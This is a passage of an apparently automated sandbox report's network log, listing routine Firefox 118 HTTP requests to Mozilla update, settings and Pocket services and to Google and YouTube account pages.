no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=516=R6AXCkxUWuMyNXOsPODa58uOz3LBr7nLToGxfNvZ-cTlF0LvjEvbcKbAeCBEZ8QkXibOrtvgVPvtONOSimFG9HyXTv-XoLELcdl8mDhS8ofmMDtz0lqoA0RDhfNvbpCE3cKWL6xjAgdQjyKK5qU_93K62ar43IvGBMafQZLj4ok
Source: global traffic	HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: cross-site
Source: global traffic	HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=953913297&timestamp=1722017443046 HTTP/1.1Host: accounts.youtube.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: https://accounts.google.com/Connection: keep-aliveUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: iframeSec-Fetch-Mode: navigateSec-Fetch-Site: cross-site
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,/Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: https://accounts.google.com/Connection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: no-corsSec-Fetch-Site: same-site
Source: global traffic	HTTP traffic detected: GET /v1/tiles HTTP/1.1Host: contile.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/ISET%3ASSE4_2%2CMEM%3A8191/default/default/update.xml HTTP/1.1Host: aus5.mozilla.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /chains/remote-settings.content-signature.mozilla.org-2023-10-29-15-54-12.chain HTTP/1.1Host: content-signature-2.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveIf-Modified-Since: Sat, 09 Sep 2023 15:54:13 GMTIf-None-Match: "defaf397a2137227b32599694fdb5208"
Source: global traffic	HTTP traffic detected: GET /v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb HTTP/1.1Host: location.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/buckets/monitor/collections/changes/changeset?_expected=0 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=US&count=30 HTTP/1.1Host: getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /desktop/v1/recommendations?locale=en-US&region=US&count=30 HTTP/1.1Host: firefox-api-proxy.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brconsumer_key: 94110-6d5ff7a89d72c869766af0e0Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/buckets/main/collections/search-telemetry-v2/changeset?_expected=1718041017650&_since=%221694014137037%22 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-aliveIf-Modified-Since: Fri, 25 Mar 2022 17:45:46 GMTIf-None-Match: "1648230346554"
Source: global traffic	HTTP traffic detected: GET /update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/ISET%3ASSE4_2%2CMEM%3A8191/default/default/update.xml?force=1 HTTP/1.1Host: aus5.mozilla.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /chains/remote-settings.content-signature.mozilla.org-2024-08-29-13-50-59.chain HTTP/1.1Host: content-signature-2.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/buckets/monitor/collections/changes/changeset?collection=quicksuggest&bucket=main&_expected=0 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /api/v4/addons/search/?guid=default-theme%40mozilla.org%2Caddons-search-detection%40mozilla.com%2Cgoogle%40search.mozilla.org%2Camazondotcom%40search.mozilla.org%2Cwikipedia%40search.mozilla.org%2Cbing%40search.mozilla.org%2Cddg%40search.mozilla.org%2Cfirefox-compact-light%40mozilla.org%2Cfirefox-compact-dark%40mozilla.org%2Cfirefox-alpenglow%40mozilla.org%2Cebay%40search.mozilla.org&lang=en-US HTTP/1.1Host: services.addons.mozilla.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/buckets/main/collections/url-classifier-skip-urls/changeset?_expected=1720004688246&_since=%221606870304609%22 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/buckets/main/collections/quicksuggest/changeset?_expected=1721842166733 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fimgix.bustle.com%2Fuploads%2Fimage%2F2024%2F7%2F24%2Fd57cdb8b%2Fquitcooking_social.jpg%3Fw%3D1200%26h%3D630%26fit%3Dcrop%26crop%3Dfaces%26fm%3Djpg HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,/Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic	HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs.zkcdn.net%2FAdvertisers%2Ff85f50edcf894021a38860edd7f5438c.jpg HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,/Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic	HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fmedia.wired.com%2Fphotos%2F669ee1db82dcc6be43bb872a%2F191%3A100%2Fw_1280%2Cc_limit%2FAMOC_Laerke_011.jpg HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,/Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic	HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs.zkcdn.net%2FAdvertisers%2F8c6ba27004c947fdb8667ce4914d41c8.png HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,/Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic	HTTP traffic detected: GET /CAP5k4gWqcBGwir7bEEmBWveLMtvldFu-y_kyO3txFA=.9991.jpg HTTP/1.1Host: tiles-cdn.prod.ads.prod.webservices.mozgcp.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,/Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: no-corsSec-Fetch-Site: cross-site
Source: global traffic	HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fd1n0c1ufntxbvh.cloudfront.net%2Fphoto%2Feabcdc61%2F98254%2F1200x%2F HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,/Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic	HTTP traffic detected: GET /m6BvG6Rcntmafem2bLfA5IktKm1SEwqO2E4XIjaC12c=.10862.jpg HTTP/1.1Host: tiles-cdn.prod.ads.prod.webservices.mozgcp.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,/Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: no-corsSec-Fetch-Site: cross-site
Source: global traffic	HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb1da8a8e-07d7-4788-a750-b444d5b94049.jpeg HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,/Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic	HTTP traffic detected: GET /update/3/SystemAddons/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/default/default/update.xml HTTP/1.1Host: aus5.mozilla.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /update/3/GMP/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/default/default/update.xml HTTP/1.1Host: aus5.mozilla.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/buckets/main/collections/nimbus-desktop-experiments/changeset?_expected=1721935300722&_since=%221696422861896%22 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /update/3/GMP/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/default/default/update.xml HTTP/1.1Host: aus5.mozilla.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /chains/202402/aus.content-signature.mozilla.org-2024-09-02-22-40-36.chain HTTP/1.1Host: content-signature-2.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /chains/202402/aus.content-signature.mozilla.org-2024-09-02-22-40-36.chain HTTP/1.1Host: content-signature-2.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/32706371-5612-48cb-8cf8-6a1c97906e3c HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/bea0c2fe-9c8c-4351-9ede-4051baa1ed47.json HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/8e264f27-207e-4cfd-84c9-8ea2fce78243 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/20f6c216-2267-4b1e-af58-22d224043fe9 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/4390d749-61a9-4b7a-ac8f-88a2a8145c59 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/5e1b56db-af05-453a-83ac-7c094f25918d HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/3012260d-8f8d-4863-9be6-03970e37af68 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/dff96728-c23d-4f24-91c7-9233d01352d4 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/7b0c093e-1c31-409b-a323-78ca82e5f600 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/25043d3b-9aeb-4f57-a7da-874ab81697bd HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/a960129b-64a7-439d-a8e6-f8d201e0b44e HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/437e6fa9-e584-4be9-8a1f-e4951809fd17 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/118946fc-cb7b-4340-a9e0-a565a5c8876b HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/05f7ba7a-f7cf-4288-a89f-8fad6970a3b8 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /main-workspace/quicksuggest/f11c1bba-0d2e-44d8-acb1-e375719dd8b8 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
